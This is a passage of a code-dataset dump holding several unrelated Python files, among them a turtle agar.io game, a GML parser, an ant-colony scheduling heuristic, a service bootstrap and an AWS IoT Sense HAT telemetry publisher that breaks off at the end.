print(f\"total: {total}\")\n vectors = articles.count_documents({'vector': {'$exists': True}})\n print(f\"vectors: {vectors}\")\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"py-crawl/mongoClient.py","file_name":"mongoClient.py","file_ext":"py","file_size_in_byte":613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"159499839","text":"# https://programmers.co.kr/learn/courses/30/lessons/49994\n\n\ndef solution(dirs):\n answer = set()\n r = c = 5\n for d in dirs:\n tr, tc = r, c\n if d == \"U\":\n tr += 1\n elif d == \"D\":\n tr -= 1\n elif d == \"R\":\n tc += 1\n else:\n tc -= 1\n if 0 <= tr < 11 and 0 <= tc < 11:\n a = r * 11 + c\n b = tr * 11 + tc\n answer.add(121 * a + b if a > b else 121 * b + a)\n r, c = tr, tc\n return len(answer)\n\n\nprint(solution(\"LULLLLLLU\"))\n","sub_path":"programmers/laern/2018_winter_coding_02.py","file_name":"2018_winter_coding_02.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"406276172","text":"from turtle import *\nimport turtle\nimport time\nimport random\nimport math\nfrom ball import Ball\n\ncolormode(255)\nhideturtle()\ntracer(0)\nturt = turtle.Turtle()\nRUNNING = True\nSLEEP = 0.0077\nJ = turtle.Canvas()\nSCREEN_WIDTH = J.winfo_width() / 2\nSCREEN_HEIGHT = J.winfo_height() / 2\n\nNUMBER_OF_BALLS = 5\nMINIMUM_BALL_RADIUS = 10\nMAXIMUM_BALL_RADIUS = 100\nMAXIMUM_BALL_DX = 5\nMINIMUM_BALL_DX = -5\n\nMINIMUM_BALL_DY = -5\nMAXIMUM_BALL_DY = 5\n\nballs = []\n# score = 0\n# scoret = turtle.clone()\nfor i in range(NUMBER_OF_BALLS):\n x = random.randint(int(-SCREEN_WIDTH + MAXIMUM_BALL_RADIUS),\n int(SCREEN_WIDTH - 
MAXIMUM_BALL_RADIUS))\n y = random.randint(int(-SCREEN_HEIGHT + MAXIMUM_BALL_RADIUS),\n int(SCREEN_HEIGHT - MAXIMUM_BALL_RADIUS))\n dx = random.randint(MINIMUM_BALL_DX, MAXIMUM_BALL_DX)\n dy = random.randint(MINIMUM_BALL_DY, MAXIMUM_BALL_DY)\n while dx == 0:\n dx = random.randint(MINIMUM_BALL_DX, MAXIMUM_BALL_DX)\n\n while dy == 0:\n dy = random.randint(MINIMUM_BALL_DY, MAXIMUM_BALL_DY)\n\n radius = random.randint(MINIMUM_BALL_RADIUS, MAXIMUM_BALL_RADIUS)\n colour = (random.random(), random.random(), random.random())\n r = random.randint(0, 255)\n g = random.randint(0, 255)\n b = random.randint(0, 255)\n\nnew_ball = Ball()\nballs.append(new_ball)\n\n\ndef move_all_balls():\n for variable in range(NUMBER_OF_BALLS):\n balls[variable].move(SCREEN_WIDTH, SCREEN_HEIGHT)\n\n\ndef check_collide(ball_a, ball_b):\n if ball_a == ball_b:\n return False\n\n distance = math.sqrt(\n math.pow(ball_a.x - ball_b.x, 2) + math.pow(ball_a.y - ball_b.y, 2))\n\n if distance + 10 < ball_a.r + ball_b.r:\n return True\n else:\n return False\n\n\ndef check_all_balls_collision():\n for ball_a in balls:\n for ball_b in balls:\n if check_collide(ball_a, ball_b) == True:\n radiusA = ball_a.r\n radiusB = ball_b.r\n random_x = random.randint(screen_random1_x, screen_random2_x)\n random_y = random.randint(screen_random1_y, screen_random2_y)\n random_dx = random.randint(minimum_ball_dx, maximum_ball_dx)\n while random_dx == 0:\n random_dx = random.randint(minimum_ball_dx,\n maximum_ball_dx)\n random_dy = random.randint(minimum_ball_dy, maximum_ball_dy)\n while random_dy == 0:\n random_dy = random.randint(minimum_ball_dy,\n maximum_ball_dy)\n radius = random.randint(minimum_ball_radius,\n maximum_ball_radius)\n color = (random.randint(0, 255), random.randint(0, 255),\n random.randint(0, 255))\n\n if radiusA > radiusB:\n ball_b.goto(random_x, random_y)\n ball_b.dx = random_dx\n ball_b.dy = random_dy\n ball_b.r = radius\n ball_b.shapesize(ball_b.r / 10)\n ball_b.color = color\n ball_a.r += 0.5\n ball_a.shapesize(ball_a.r / 10)\n\n elif radiusA < radiusB:\n ball_a.goto(random_x, random_y)\n ball_a.dx = random_dx\n ball_a.dy = random_dy\n ball_a.r = radius\n ball_a.shapesize(ball_a.r / 10)\n ball_a.color = color\n ball_b.r += 0.5\n ball_b.shapesize(ball_b.r / 10)\n\n\ndef check_myball_collision():\n score = 0\n scoret = turt.clone()\n for ball in balls:\n random_x = random.randint(screen_random1_x, screen_random2_x)\n random_y = random.randint(screen_random1_y, screen_random2_y)\n random_dx = random.randint(MINIMUM_BALL_DX, MAXIMUM_BALL_DX)\n while random_dx == 0:\n random_dx = random.randint(MINIMUM_BALL_DX, MAXIMUM_BALL_DX)\n random_dy = random.randint(MINIMUM_BALL_DY, MAXIMUM_BALL_DY)\n while random_dy == 0:\n random_dy = random.randint(MINIMUM_BALL_DY, MAXIMUM_BALL_DY)\n radius = random.randint(MINIMUM_BALL_RADIUS, MAXIMUM_BALL_RADIUS)\n color = (\n random.randint(0, 255), random.randint(0, 255),\n random.randint(0, 255))\n if check_collide(new_ball, ball) == True:\n radiusC = new_ball.r\n radiusD = ball.r\n\n if new_ball.r < ball.r:\n print(\"you suck, GAME OVER\")\n return False\n else:\n new_ball.r += 2\n new_ball.shapesize(new_ball.r / 10)\n score += 1\n scoret.pu()\n scoret.goto(0, 250)\n scoret.clear()\n scoret.write(\"SCORE: \" + str(score), align=\"center\",\n font=(\"Arial\", 20, \"normal\"))\n ball.goto(random_x, random_y)\n ball.dx = random_dx\n while ball.dx == 0:\n ball.dx = random.randint(MINIMUM_BALL_DX, MAXIMUM_BALL_DX)\n ball.dy = random_dy\n while ball.dy == 0:\n ball.dy = random.randint(MINIMUM_BALL_DY, 
MAXIMUM_BALL_DY)\n ball.r = radius\n ball.shapesize(ball.r / 10)\n ball.color = color\n return True\n\n\ndef movearound(event):\n x1 = event.x - SCREEN_WIDTH\n y1 = SCREEN_HEIGHT - event.y\n turtle.goto(x1, y1)\n\n\nturtle.getcanvas().bind(\"\", movearound)\nturtle.listen()\n\nwhile RUNNING == True:\n if SCREEN_WIDTH != (\n turtle.getcanvas().winfo_width() / 2) or SCREEN_HEIGHT != (\n turtle.getcanvas().winfo_height() / 2):\n SCREEN_WIDTH = (turtle.getcanvas().winfo_width() / 2)\n SCREEN_HEIGHT = (turtle.getcanvas().winfo_height() / 2)\n move_all_balls()\n # check_all_balls_collision()\n if check_myball_collision() == False:\n turtle.goto(0, 0)\n turtle.write(\"you suck, GAME OVER!\", align=\"center\",\n font=(\"Arial\", 50, \"normal\"))\n time.sleep(5)\n turtle.bye()\n getscreen().update()\n time.sleep(sleep)\nmainloop()\n\n#wtf with import turtle *\n#do i need to return something in the move.Ball function?\n#how to- color mode\n#what does get canvas do?\n#is the clone ok\n#is the indentation at the agario file ok\n#why when i try to create a new_ball object , while using the class Ball it says that i applied less arguments than it requiers \n","sub_path":"agario.py","file_name":"agario.py","file_ext":"py","file_size_in_byte":6497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"251035605","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\npygml for parsing GML files (ISO19136)\n\"\"\"\n\n__title__ = 'pygml'\n__author__ = 'Jürgen Weichand'\n__version__ = '0.3.1'\n__license__ = 'Apache 2.0'\n__copyright__ = 'Copyright 2015 Jürgen Weichand'\n\n\nfrom collections import OrderedDict\nimport logging\nimport os\nimport re\nimport tempfile\nimport json\n\n#from extlib.pygml.xmltodict import xmltodict\nfrom .xmltodict import *\n\n\nclass GmlException(Exception):\n\n def __init__(self, message):\n self.message = message\n\n def __str__(self):\n return repr(self.message)\n\n\ndef getTempfile(filename):\n tmpdir = tempfile.gettempdir()\n if not os.path.exists(tmpdir):\n os.makedirs(tmpdir)\n tmpfile = os.path.join(tmpdir, filename)\n return tmpfile\n\n\nclass Dataset():\n logformat = '%(asctime)s - %(name)s - %(levelname)s - %(message)s'\n logfile = getTempfile('pygml.log')\n logging.basicConfig(filename=logfile, level=logging.ERROR, format=logformat)\n logging.debug(dir())\n geometry_name_matcher = re.compile('(?:^|:)(?:geometry|position|the_geom)', re.IGNORECASE)\n\n def __init__(self, filename, resolve_xlink_href=True):\n\n def is_geometry(key):\n return self.geometry_name_matcher.search(key) != None\n\n def postprocessor(path, key, value):\n # remove wfs namespace\n key = key.replace('wfs:', '')\n\n # normalize FeatureCollection, member, featureMember, featureMembers\n if 'feature' in str(key.lower()) or 'member' in str(key.lower()):\n key = key.replace('gml:', '')\n\n if not is_geometry(key):\n return key, value\n\n features = {}\n f = open(filename, mode='rb')\n logging.info('Open file %s' % filename)\n features = xmltodict.parse(f, postprocessor=postprocessor)\n f.close()\n\n # logging.info(json.dumps(features, indent=3))\n logging.debug('Container type(%s)' % str(type(features)))\n logging.debug('Container %s' % [features.keys()][0])\n\n # convert single feature (count=1 or maxFeatures=1) to list\n def prepare(features):\n if type(features) == OrderedDict:\n return [features]\n return features\n\n self.__features = None\n\n # INSPIRE GML 3.2\n if 'base:SpatialDataSet' in features:\n self.__features = 
features['base:SpatialDataSet']['base:member']\n\n # WFS or GML\n if 'FeatureCollection' in features:\n\n # GML 3.2\n if 'member' in features['FeatureCollection']:\n self.__features = prepare(features['FeatureCollection']['member'])\n try:\n self.__features.extend(features['FeatureCollection']['additionalObjects']['SimpleFeatureCollection']['member'])\n except KeyError:\n pass\n # GML 3.1\n if 'featureMembers' in features['FeatureCollection']:\n list = []\n for key in features['FeatureCollection']['featureMembers'].keys():\n for value in features['FeatureCollection']['featureMembers'][key]:\n dict = OrderedDict()\n dict[key] = value\n list.append(dict)\n self.__features = list\n # GML 2.0\n if 'featureMember' in features['FeatureCollection']:\n self.__features = prepare(features['FeatureCollection']['featureMember'])\n\n if not self.__features:\n raise GmlException('Unsupported GML-Container!')\n\n logging.debug('Container type(%s)' % str(type(self.__features)))\n\n if resolve_xlink_href:\n logging.info('Resolving xlink:href references')\n self.__resolve(self.__features)\n\n def getFeatures(self):\n logging.debug('getFeatures()')\n logging.debug('type(getFeatures()) = %s' % type(self.__features))\n return self.__features\n\n #TODO: auf das erste tupe zugreifen und prüfen ob @fid oder @gml:id enthalten ist ('@gml:id','Name')\n # - scheint nicht ordnungsgemäß auf das dict zuzugreifen\n def getFeature(self, id):\n logging.debug('getFeature(%s)' % id)\n features = self.getFeatures()\n \n for feature in features:\n for gml_id in ['@fid', '@gml:id']:\n if gml_id in list(feature.values())[0]:\n if list(feature.values())[0][gml_id] == id:\n return feature\n return None\n\n def __resolve(self, value):\n if type(value) == OrderedDict:\n for key, val in sorted(value.items()):\n if 'xlink:href' in key:\n logging.debug('Resolving %s' % val)\n val = val.replace('#', '')\n feature = self.getFeature(val)\n if feature:\n logging.debug('Successful resolved %s' % val)\n # value['@xlink:href'] = feature\n value['@xlink:href [resolved]'] = feature\n else:\n logging.debug('Unable to resolve %s' % val)\n pass\n else:\n self.__resolve(val)\n\n if type(value) == list:\n for val in value:\n self.__resolve(val)","sub_path":"pygml/pygml.py","file_name":"pygml.py","file_ext":"py","file_size_in_byte":5328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"500679745","text":"from typing import List\n\nfrom src.service.template.bootstrap import Bootstrap\nfrom src.auth import router as auth\n\nfrom src.service.template.bootstrap import LOADABLE_REDIS, LOADABLE_RABBITMQ, LOADABLE_SENTRY, LOADABLE_SOCKET, \\\n LOADABLE_FASTAPI, LOADABLE_MONGO\n\nfrom src.service.template.drivers.services.logging import LoggingService, LogSearch\nfrom src.service.template.utils.state import State\n\n\"\"\"\nSECTION: CONFIGURATION AND SETUP\n\nTHESE VARIABLES ARE EXTREMELY IMPORTANT AND MUST BE SET FOR EACH SERVICE\n\"\"\"\n\n\"\"\"\nloadables\nThis defines which drivers should be loaded when the service runs\nEach driver has an associated constant\nAdd the applicable constant to the list for the drivers you wish to use\n\"\"\"\nloadables = [LOADABLE_RABBITMQ, LOADABLE_SENTRY, LOADABLE_FASTAPI, LOADABLE_MONGO]\n\n\"\"\"\nservice_name\nThe name of this service\n\"\"\"\nservice_name = \"Authentication Service\"\n\n\"\"\"\nservice_key\nThe 'key' name of this server. 
It should be all lowercase and without any spaces or special symbols.\nThis name is used for the path to the configuration for this service\n\"\"\"\nservice_key = \"auth\"\n\n\"\"\"\nservice_version\nThis is the version of the service\n\"\"\"\nservice_version = \"0.1.0\"\n\n\"\"\"\nconfigs\nThis is used to define the names (including .yaml) of other configuraiton files you would like to have the application\n load for you.\nIf you are satisfied with the app.yaml and bootstrap.yaml configuration files, leave this value at None\n\"\"\"\nconfigs: List[str] = None\n\n\"\"\"\ndev_mode\nThis can either be toggled here or by launching the application with the `--dev` argument\nDev mode will preform tests on each driver, run the fastapi dev server if fastapi is enabled, and use the alternate\n configuration files\n\"\"\"\ndev_mode: bool = False\n\n\"\"\"\nconfig_path\nThis is an override for the configuration path\nIt is very unlikely that you should need to change this, but if you have configs stored somewhere else and this\n makes it convenient, go for it. \n\"\"\"\nconfig_path: str = None\n\n\"\"\"\nSECTION: BOOTSTRAPPING\n\"\"\"\n\n\nclass ServiceBootstrap(Bootstrap):\n \"\"\"\n This class sets up the entire service\n \n There are plenty of methods you can override in this class.\n Most of these methods have defaults that just work. However, in the case of custom functionality or more control\n just override them.\n The methods which you are most likely to require have a '!' to the left of their name\n\n Note: If you do not override post_load, the application will end immediately if you are not using fast api\n \n pre_load()\n * This method is called prior to any drivers being loaded\n\n sentry_init()\n * This method is used to setup sentry\n\n fastapi_init()\n * This method is used to setup fastapi\n\n ! fastapi_middleware()\n * This method is used to inject middleware into fastapi\n\n ! fastapi_routers()\n * This method is used to inject routers into fastapi\n\n socket_init()\n * This method is used to setup socket io\n\n redis_init()\n * This method is used to setup redis\n\n mongo_init()\n * This method is used to setup mongo\n\n rabbitmq_init()\n * This method is used to setup rabbitmq\n\n ! fastapi_register_endpoints()\n * This method is used to define extra endpoints for fastapi which are not already in a router\n\n ! socket_register_events()\n * This method is used to define all of your socket io events\n\n ! 
post_load()\n * This method is called after all of the drivers have been loaded\n * In other words, this method should be where your application logic begins\n \"\"\"\n\n def __init__(self):\n super().__init__(service_name, service_key, service_version, loadables, config_path, configs, dev_mode)\n\n def fastapi_routers(self):\n self.fastapi_driver.instance.include_router(\n auth.router,\n prefix=\"/auth\",\n tags=[\"auth\"],\n responses={404: {\"description\": \"Not found\"}},\n )\n\n def post_load(self):\n logger = LoggingService(State.rabbitmq.connection_details, service_name)\n State.services['logger'] = logger\n","sub_path":"src/service_bootstrap.py","file_name":"service_bootstrap.py","file_ext":"py","file_size_in_byte":4116,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"535729650","text":"from os import path, getenv\nfrom dotenv import load_dotenv\n\nload_dotenv()\n__dirname = path.dirname(__file__)\n\n\"\"\" client settings \"\"\"\n__lib = \"lib/tdjson.dll\" # your tdjson .so or .dll file (depending on your OS)\nCLIENT = {\n \"use_test_dc\": False,\n \"tdlib_path\": path.join(__dirname, __lib),\n \"wait_timeout\": 1, # second/s\n \"database_directory\": \"tdlib\",\n \"use_file_database\": False,\n \"use_chat_info_database\": False,\n \"use_message_database\": False,\n \"use_secret_chats\": True,\n \"api_id\": int(getenv(\"API_ID\")), # your API_ID\n \"api_hash\": str(getenv(\"API_HASH\")), # your API_HASH\n \"system_language\": \"en\",\n \"device_model\": \"Desktop\",\n \"app_version\": \"1.2\",\n \"enable_storage_optimizer\": True,\n \"group_messages\": False, # group media messages or not\n}\n\n\"\"\" forwarder settings \"\"\"\nFORWARDER = {\n \"limit_chats\": 10000,\n \"periodicity_fwd\": 1, # second/s\n \"log_path\": path.join(__dirname, \"log\\\\app.log\"),\n \"rules_path\": path.join(__dirname, \"rules.json\"),\n}\n","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1014,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"545400225","text":"import numpy as np\r\nfrom matplotlib import pyplot\r\n\r\ndata = np.loadtxt('Book1.csv', delimiter=',')\r\npeak = np.zeros((1,2))\r\nflag = True\r\n# for i in range(100000):\r\nfor i in range(len(data[:,0])):\r\n if(data[i][1] > 50000 and data[i][1]-data[i-1][1] < 0 and flag == True):\r\n peak = np.append(peak,np.array([[data[i][1],data[i][2]]]), axis=0)\r\n flag = False\r\n elif(data[i][1] > 50000 and data[i][1]-data[i-1][1] > 0 and flag == False):\r\n flag = True\r\n\r\npeak_all = np.delete(peak, 0, 0)\r\na = len(peak_all[:,0])\r\nprint(a)\r\nrri = np.zeros((1,2))\r\nfor i in range(len(peak_all[:,0])-1):\r\n rri = np.append(rri,np.array([[peak_all[i+1][0],peak_all[i+1][0]-peak_all[i][0]]]), axis=0)\r\n\r\nrri_all = np.delete(rri, 0, 0)\r\n# print(rri_all)\r\nfreq = np.linspace(0, 1/1.1, len(rri_all[:,0]))\r\nF = np.fft.fft(rri_all[:,1])\r\nAmp = np.abs(F)\r\n# print(freq)\r\npyplot.plot(freq, Amp)\r\npyplot.xlim(0,0.5)\r\npyplot.ylim(0,10)\r\n# pyplot.plot(rri_all[:,0], rri_all[:,1])\r\npyplot.show()","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"342363131","text":"import random\nimport json\nimport copy\nimport time\nimport CrearMapa\nimport CrearEscenario\nimport numpy\nimport winsound\n\n\ndef darProbabilidad(matriz, tiempo, nodoActual, feromonas, alpha, 
beta, habOrdenes, habEmpleados, q):\n\n probabilidad = []\n vector = []\n\n for i in range(len(matriz)):\n if (matriz[nodoActual][i] != 0):\n\n #Una orden solo puede ser antendida por un empleado con un minimo de habilidades\n if(sum(numpy.array(habOrdenes[i]) * numpy.array(habEmpleados)) >= q * sum(numpy.array(habOrdenes[i]))):\n vector.append(round(beta / matriz[nodoActual][i] + alpha * feromonas[nodoActual][i], 2))\n else:\n vector.append(0)\n else:\n vector.append(0)\n\n vector[0] = 0\n\n suma = sum(vector)\n if(suma == 0):\n return probabilidad\n\n #Calcular probabilidades\n for i in range(len(matriz)):\n if matriz[nodoActual][i] == 0:\n if len(probabilidad) > 0:\n probabilidad.append(probabilidad[i - 1])\n else:\n probabilidad.append(0)\n else:\n if (matriz[nodoActual][i] + matriz[i][0]) < tiempo:\n if len(probabilidad) > 0:\n probabilidad.append(vector[i] / suma + probabilidad[i - 1])\n else:\n probabilidad.append(vector[i] / suma)\n else:\n if len(probabilidad) > 0:\n\n probabilidad.append(probabilidad[i - 1])\n else:\n probabilidad.append(0)\n return probabilidad\n\n\ndef borrarNodo(nodoActual, matriz):\n for i in range(len(matriz)):\n matriz[i][nodoActual] = 0\n return matriz\n\n\ndef actualizarFeromonas(secuencia, valorsecuencias, feromonas, rho):\n deltaFeromonas = []\n\n #Inicializar delta feromonas\n for i in range(len(feromonas)):\n deltaFeromonas.append(numpy.repeat(0, len(feromonas)).tolist())\n\n #Calcular delta feromonas\n for i in range(len(secuencia)):\n for j in range(len(secuencia[i]) - 1):\n deltaFeromonas[secuencia[i][j]][secuencia[i][j + 1]] += valorsecuencias[i]\n\n #Retorna feromonas con evaporación\n return (numpy.array(deltaFeromonas) + numpy.array(feromonas)) * rho\n\n\ndef heuristica(iteraciones, hormigas):\n #CrearEscenario.crearEscenario(6, 230, 4)\n CrearEscenario.crearEscenario(2, 16, 2, 0.05)\n\n # Guardar tiempo inicial\n timerGeneralInicial = time.time()\n\n #Parametros metaheuristica\n alpha = 1\n beta = 5\n rho = 0.5\n #iteraciones = 50\n #hormigas = 50\n\n #Leer archivos json\n with open('Escenario.json') as file:\n data = json.load(file)\n tiempoDesplazamiento = data['tiempoDesplazamiento']\n tiempoAtencion = data['tiempoAtencion']\n tiempoD = data['horasTrabajo']\n numEmpleados = data['numEmpleados']\n numDias = data['numDiasOperacion']\n habEmp = data['habilidadesOperarios']\n habOrde = data['habilidadesOrdenes']\n qParametro = data['porcentajeCumplimientoHabilidades']\n prioridad = data['prioridad']\n costoAns = data['costosANS']\n maxDia = data['maxDia']\n\n\n #Calcular tiempo total\n tiempoTotal = []\n for i in range(len(tiempoDesplazamiento)):\n vectorActual = []\n for j in range(len(tiempoDesplazamiento)):\n if (tiempoDesplazamiento[i][j] != 0):\n vectorActual.append(round(tiempoDesplazamiento[i][j] + tiempoAtencion[j],2))\n else:\n vectorActual.append(0)\n tiempoTotal.append(vectorActual)\n\n\n #Inicializar feromonas\n feromonas = []\n for i in range(len(tiempoDesplazamiento)):\n feromonas.append(numpy.repeat(1, len(tiempoDesplazamiento)).tolist())\n\n\n #Inicializar respuesta\n secuenciaM = []\n valorSecuenciaMax= 0\n\n #Inicio de metaheuristica\n for j in range(iteraciones):\n #Secuencias de iteración\n secuencias = []\n valorSecuencias = []\n for i in range(hormigas):\n\n #Reiniciar hormiga\n tiempo = copy.deepcopy(tiempoTotal)\n secuencia = []\n\n valorSecuencia = 0\n for dias in range(numDias):\n\n #Auxiliar minMax\n minMax = 999\n for emp in range(numEmpleados):\n\n #Reiniciar variables\n habilidadesEmpleado = habEmp[emp]\n 
tiempoDisponible = tiempoD[emp][dias]\n vacio = True\n ordenes = 0\n\n #En cada recorrido inicio en el nodo 0\n nodoActual = 0\n\n\n while (vacio or nodoActual != 0):\n probabilidad = darProbabilidad(tiempo, tiempoDisponible, nodoActual, feromonas, alpha, beta,\n habOrde, habilidadesEmpleado, qParametro)\n\n #Determinar nodo a ir\n aleatorio = random.random()\n contador = 0\n\n while contador < len(probabilidad) and aleatorio > probabilidad[contador]:\n contador += 1\n\n #Probabilidad volver a orden 0\n if(len(probabilidad)) > 1:\n if (probabilidad[len(probabilidad) - 1] < aleatorio):\n contador = 0\n\n #Actualizo valores\n tiempoDisponible -= tiempo[nodoActual][contador]\n\n valorSecuencia += 1/(tiempo[nodoActual][contador]+1)\n nodoActual = contador\n\n\n\n #Actualizar valor de la secuencia\n if(nodoActual!=0):\n valorSecuencia += prioridad[nodoActual]\n ordenes += 1\n if(maxDia[nodoActual] < dias):\n valorSecuencia -= (dias - maxDia[nodoActual]) * costoAns[nodoActual] * prioridad[nodoActual]\n\n\n secuencia.append(nodoActual)\n vacio = False\n\n #Un nodo no se visita dos veces\n if(nodoActual!=0):\n tiempo = borrarNodo(nodoActual, tiempo)\n\n if(ordenes < minMax):\n minMax = ordenes\n valorSecuencia += (minMax + 1) * 0.05\n\n #Guardar mejor secuencia\n if valorSecuencia > valorSecuenciaMax:\n secuenciaM = secuencia\n valorSecuenciaMax = valorSecuencia\n\n\n secuencias.append(secuencia)\n valorSecuencias.append(valorSecuencia)\n\n #Actualiza feromonas\n feromonas = actualizarFeromonas(secuencias, valorSecuencias, feromonas, rho)\n\n ordenesMapa = []\n ordenesMapa.append(0)\n for i in secuenciaM:\n ordenesMapa.append(i)\n ordenesMapa.append(i)\n print(ordenesMapa)\n CrearMapa.crearMapa(ordenesMapa)\n\n print(\"La mejor secuencia es\")\n print(secuenciaM)\n print(\"Se pudieron atender \" + str(len(secuenciaM) - (numDias * numEmpleados)) + \" ordenes de \" + str(\n len(habOrde) - 1))\n timerGeneralFinal = time.time()\n timerGeneral = timerGeneralFinal - timerGeneralInicial\n print(\"La función objetivo tiene un valor de: \" + str(valorSecuenciaMax))\n print(\"Tiempo de ejecución total: \" + str(round(timerGeneral, 2)) + \" segundos\")\n\n f = open('escalabilidad.txt', 'a')\n f.write('\\n' + \"Heuristica\")\n f.write('\\n' + str(valorSecuenciaMax))\n f.write('\\t' + str(len(secuenciaM) - (numDias * numEmpleados)))\n f.write('\\t' + str(round(timerGeneral, 2)))\n f.close()\n\n '''\n while True:\n duration = 1000 # milliseconds\n freq = 440 # Hz\n winsound.Beep(freq, duration)\n '''\n\n\n\nheuristica(100,100)","sub_path":"tesis/Heuristica.py","file_name":"Heuristica.py","file_ext":"py","file_size_in_byte":7872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"20722707","text":"#######\n# Log #\n#######\n\n'''\nSetting up the logging system. 
It's really simple to use.\nIncluding these lines at the top of the file you want to log should suffice:\n\n>>> import logging\n>>> import logging.config\n>>>\n>>> # Importing the default configuration\n>>> from ..logger import LOGGING_CONFIG\n>>>\n>>> # Creating logger and setting up the configuration\n>>> logging.config.dictConfig(LOGGING_CONFIG)\n>>> LOGGER = logging.getLogger(__name__)\n'''\n\nimport os\n\nLOG_DIR = os.path.dirname(os.path.realpath(__file__))\nGHOST_LOG = os.path.join(LOG_DIR, 'ghost.log')\n\ntry:\n open(GHOST_LOG, 'r')\nexcept IOError:\n open(GHOST_LOG, 'w')\n\nLOGGING_CONFIG = {\n 'version': 1, # inserting logfile on this version\n 'disable_existing_loggers': False,\n 'formatters': {\n 'verbose': {\n 'format': '%(asctime)s;%(levelname)-1s;'\n '%(name)s;%(funcName)s(%(lineno)d);%(message)s'\n },\n \"terminal\": {\n \"format\": \"%(asctime)s %(levelname)-1s %(name)s:%(message)s\"\n },\n },\n 'handlers': {\n 'screen': {\n 'class': 'logging.StreamHandler',\n 'level': 'INFO',\n 'stream': 'ext://sys.stdout',\n 'formatter': 'terminal'\n },\n 'file': {\n 'class': 'logging.FileHandler',\n 'level': 'DEBUG',\n 'filename': GHOST_LOG,\n 'formatter': 'verbose'\n }\n },\n 'loggers': {\n 'neural_network': {\n 'level': 'DEBUG',\n 'handlers': ['screen', 'file'],\n 'propagate': 'no'\n },\n 'statistics': {\n 'level': 'DEBUG',\n 'handlers': ['screen', 'file'],\n 'propagate': 'no'\n }\n },\n \"root\": {\n \"level\": \"DEBUG\",\n \"handlers\": ['screen', 'file']\n }\n}\n","sub_path":"arcedosml/logger/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"647959546","text":"########################################################################################################################\n# #\n# MIT License #\n# #\n# Copyright (c) 2018 Telefonica R&D #\n# #\n# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated #\n# documentation files (the \"Software\"), to deal in the Software without restriction, including without limitation the #\n# rights in the Software without restriction, including without limitation the rights o use, copy, modify, merge, #\n# publish, to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and #\n# to permit persons to whom the Software is furnished to do so, subject to the following conditions: #\n# #\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO #\n# INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.#\n# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN #\n# AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER #\n# DEALINGS IN THE SOFTWARE. 
#\n# #\n########################################################################################################################\nfrom __future__ import print_function\nfrom sense_hat import SenseHat\nimport paho.mqtt.client as mqtt\nimport sys, traceback\nimport json\nimport ssl\nimport yaml\nimport time\n\ndef on_message(mqttc, userdata, message):\n data_delta = str(message.payload.decode(\"utf-8\"))\n json_delta = json.loads(data_delta)\n print(\"Received message:\")\n print(data_delta)\n return 0\n\ndef ssl_alpn_AWS(config_cloud):\n try:\n ssl_context = ssl.create_default_context()\n ssl_context.set_alpn_protocols([\"x-amzn-mqtt-ca\"])\n ca = \"cert/AmazonRootCA1.pem\"\n cert = \"cert/certificate_pem.pem.crt\"\n private = \"cert/PrivateKey.pem.key\"\n ssl_context.load_verify_locations(cafile=ca)\n ssl_context.load_cert_chain(certfile=cert, keyfile=private)\n print(\"ssl context created:\")\n return ssl_context\n\n except Exception as e:\n traceback.print_exc(file=sys.stdout)\n\n\ndef cloud_connector_AWS(config_cloud):\n try:\n mqttc = mqtt.Client()\n ssl_context = ssl_alpn_AWS(config_cloud)\n mqttc.tls_set_context(context=ssl_context)\n broker = config_cloud[\"broker\"]\n mqttc.connect(broker, port=8883)\n\n # Assign event callbacks\n mqttc.on_message = on_message\n\n # Subscribe to topic\n\n\n # Start\n mqttc.loop_start()\n print(\"MQTT broker connected:\")\n\n return mqttc\n\n except Exception as e:\n traceback.print_exc(file=sys.stdout)\n\nif __name__== \"__main__\":\n try:\n\n with open('AWS_configuration.yaml', 'r') as f:\n config_cloud = yaml.load(f)\n f.close()\n sense = SenseHat()\n connection = cloud_connector_AWS(config_cloud)\n\n json_reported = {\"state\": {\"reported\": {}}}\n json_reported[\"state\"][\"reported\"] = {}\n\n while True:\n\n json_reported[\"state\"][\"reported\"][\"temperature\"] = sense.get_temperature()\n json_reported[\"state\"][\"reported\"][\"humidity\"] = sense.get_humidity()\n json_reported[\"state\"][\"reported\"][\"pressure\"] = sense.get_pressure()\n json_reported[\"state\"][\"reported\"][\"accelerometer\"] = sense.get_accelerometer_raw()\n json_reported[\"state\"][\"reported\"][\"orientation\"] = sense.get_orientation()\n json_reported[\"state\"][\"reported\"][\"compass\"] = sense.get_compass()\n\n msg_reported = json.dumps(json_reported)\n topic = \"$aws/things/\" + config_cloud[\"thing\"] + \"/shadow/update\"\n connection.publish(topic, msg_reported)\n print(\"msg published:\")\n time.sleep(20)\n\n except Exception as 